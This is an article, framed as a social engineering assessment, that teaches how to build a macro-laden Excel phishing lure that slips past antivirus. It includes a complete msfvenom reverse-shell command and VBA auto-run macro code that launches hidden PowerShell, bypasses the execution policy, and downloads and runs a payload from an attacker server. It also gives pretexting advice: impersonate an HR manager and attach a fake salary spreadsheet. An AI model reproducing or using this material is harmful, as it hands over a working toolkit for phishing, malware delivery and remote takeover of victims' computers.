A recent trend shows that social engineering is the most commonly used attack vector by hackers to compromise organizations. Largest of the organizations have been compromised using this attack vector. Employees are often tricked into clicking links and running enticing looking Office documents that end up being malicious. It is very well known how trivial it is to bypass Anti-virus protection mechanism.

In this article, we will learn how to create a Microsoft Office document that bypasses signature and heuristic based Antivirus engines to run a meterpreter reverse shell payload.

Before I go on to explain how antivirus can be bypassed, we need to understand how they work.

At a high-level, there are two main methods utilized by Antivirus software:

  1. Signature based detection – can identify malicious code only when it is saved on the disk. It is then that the antivirus can read the file and compare it with the database of signatures it has. Antivirus software maintains a large database of known malicious patterns and will look for any matches against the software being analyzed.  This method is relatively quick and requires less computational power
  2. Heuristic-based detection – is often utilized in combination with signature-based detection.  The antivirus software analyzes the behavior of software to determine whether it is performing malicious activities.  This is commonly achieved by sandboxing a program for a period of time to analyze its actions (such as writing to memory in a specific manner or immediately opening a channel and attempting to establish an external connection) for questionable behavior.  This method can identify malicious programs that do not match against any known antivirus signatures; however, it comes at the cost of performance, and therefore vendors often have to compromise between security and usability when implementing this heuristic analysis.

What antivirus solutions are not very good at is detecting code that runs in memory. So our aim should be to run the malicious code in memory.

Scenario for the attack

The scenario of the attack is that a social engineering assessment needs to be performed on the organization. The first step is to gain an initial foothold to the target organization. Using OSINT (Open Source Intelligence Gathering) techniques, we came to know the following:

  1. The target organization runs Symantec Endpoint Protection.
  2. The health benefits offered.
  3. The month employees are given a bonus.

For people who wish to know what OSINT is; it is the data that can be collected from publicly available sources. In this case, we used

  1. LinkedIn to learn that the organization has deployed Symantec Endpoint Protection and
  2. Glassdoor helped us to learn about the health benefits offered and the time of the year when bonuses are given to employees

Using the gathered information, we plan to create a pretext posing as the HR manager. Hence, an email needs to be crafted disguising as him/her.

We will be using a macro enabled Microsoft Excel document, and we will write a macro to download and execute a PowerShell based meterpreter payload. Since the Microsoft process is already running in memory, this process will allocate a memory space for the payload, and hence the payload will be executed in the memory without being written on the disk.

I will briefly list the steps needed to accomplish the goal:

  1. Generate a PowerShell reflection payload and start a listener.
  2. Open an excel file and write a macro to download and execute the payload.
  3. Save the file as a macro-enabled document.

Let us now cover each step in detail:

  1. Generate PowerShell reflection payload –

We choose reflection payload because it does not drop a temporary file on the target’s computer like other existing PowerShell payloads. Everything is loaded via .NET reflection so there is no need to drop a temporary .cs file for dynamic compilation.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=443 -f psh-reflection > /var/www/html/shellcode.ps1

2.Creating the malicious document –

a. Select view and click on “view macros” as shown in screenshot

b. Create the macro – Enter your favorite macro name and click on create

c. Delete everything and paste the new code mentioned below

Sub Execute()
Dim payload
payload = “powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(‘http://10.1.1.130/shellcode.ps1’));”
Call Shell(payload, vbHide)

End Sub

Sub Auto_Open()

Execute

End Sub

Sub Workbook_Open()

Execute

End Sub

Code generated using nishang (a PowerShell penetration testing framework)

Ethical Hacking Training – Resources (InfoSec)

If you wish to know what the code does, below is a brief description:

  1. Powershell.exe – executes PowerShell
  2. –WindowsStyle hidden – does not display a PowerShell window when executing this command
  3. –ExecutionPolicy Bypass – By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. So to execute the script, we should set the execution policy to Bypass
  4. –NoLogo – Hides the copyright banner at startup.
  5. –NoProfile – Does not load the Windows PowerShell profile.
  6. –c – alias for Command
  7. IEX ((New-Object Net.WebClient).DownloadString(‘http://10.1.1.130/shellcode.ps1’) – downloads the shellcode from attacker server and executes it.
  8. Auto_Open() and Workbook_Open()– executes a macro as soon as the file is opened.
  9. Save the file with your favorite name (I will be using new_salary_structure_2017)

We will now send this crafted Excel document to the target organization via an email. It should also be noted this will also bypass most email gateway or email protection mechanism since there is no malicious code inside it.

Sending it to any user having a publicly available email service provider such as Gmail or Hotmail should be a good measure to test whether this document will, in fact, be flagged as malicious as they have several protection mechanisms in place.

You can see we have successfully received the email with the attachment in the mailbox

You can see above an enticing looking email that mentions about salary structure. There is a very high probability that any employee will end opening this benign looking excel document.

So we can see that we have a successfully got a meterpreter reverse shell from IP address 10.1.1.129. This machine is running the Symantec Endpoint as can be seen from the IP address screenshot.

Now that we have an initial foothold in the organization, we can carry out further attacks.

Sources

  1. https://toshellandback.com/2015/09/30/anti-virus/